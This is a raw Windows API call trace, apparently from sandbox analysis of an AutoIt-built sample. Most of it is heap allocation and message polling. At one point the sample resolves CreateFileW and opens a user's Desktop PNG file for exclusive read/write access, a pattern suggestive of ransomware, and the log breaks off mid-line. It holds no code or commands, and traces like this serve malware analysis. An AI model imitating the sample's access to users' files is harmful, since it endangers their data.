RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.106] FreeLibrary (hLibModule=0x75c90000) returned 1 [0168.106] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.107] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.107] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0168.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.107] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.109] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.109] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0168.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd7e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0168.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vlnsdshtm2x.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.114] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.116] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0168.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: 